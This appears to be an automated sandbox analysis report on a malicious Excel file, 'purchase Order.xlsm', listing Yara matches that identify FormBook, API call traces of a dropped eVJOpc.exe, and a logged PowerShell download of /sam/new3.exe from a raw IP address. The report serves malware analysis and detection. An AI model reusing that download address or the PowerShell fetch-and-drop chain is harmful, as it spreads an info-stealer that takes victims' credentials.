            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://webshell.suite.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://wus2.contentsync.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://wus2.pagecontentsync.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: global trafficHTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive
            Source: eVJOpc.exe, 00000008.00000002.372343961.00000000006CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
            Source: purchase Order.xlsmJoe Sandbox Cloud Basic: Detection: malicious Score: 64Perma Link
            Powershell drops PE fileShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\eVJOpc.exeJump to dropped file
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493E758
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493C828
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493C848
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07943510
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07940040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07947988
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07940006
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004047D3
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004061D4
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10007AC0
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000BA02
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000BA11
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00401030
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041B8B3
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041C10F
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041C19E
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041C2BC
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041C4E6
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00408C90
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00408C95
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00402D88
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00402D90
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041CFFA
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00402FB0
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B090
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C128EC
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C120A8
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01002
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1E824
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4F900
